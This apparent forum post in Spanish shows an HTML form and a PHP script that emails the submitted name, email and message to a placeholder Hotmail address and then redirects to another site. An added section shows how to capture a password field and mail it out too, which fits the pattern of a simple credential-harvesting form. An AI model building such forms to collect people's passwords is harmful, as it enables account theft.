formulario html y php
Codigo HTML
Code
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>Formulario</title>
</head>
<body>
<table width="343" border="0"> <tr> <td><form name="form1" method="post" action="enviar.php">
<table width="338" border="0">
<tr>
<td>Nombre:</td>
<td><input name="nombre" type="text" id="nombre"></td>
</tr>
<tr>
<td>Email:</td>
<td><input name="email" type="text" id="email"></td>
</tr>
<tr>
<td>Mensaje:</td>
<td><textarea name="msg" id="msg"></textarea></td>
</tr>
<tr>
<td><input type="submit" name="Submit" value="Enviar"></td>
<td> </td>
</tr>
</table>
</form></td>
</tr> </table>
</body>
</html>
PARA CONTRASEÑA HTML:
Quote
<tr>
<td>Contraseña:</td>
<td><input type="password" name="pass"></td>
</tr>
Codigo PHP Nombre del archivo - enviar.php
Code
<?php
$mail='TuEmail@hotmail.com';
$nombre = $_POST['nombre'];
$email = $_POST['email'];
$msg = $_POST['msg'];
$thank="index.html";
$message = "
nombre:".$nombre."
email:".$email."
msg:".$msg."";
if (mail($mail,"unViciomas",$message))
Header ("Location: http://www.unviciomas.com");
?>
PARA CONTRASEÑA PHP:
Quote
1) $pass = $_POST['pass'];
2) pass:".$pass."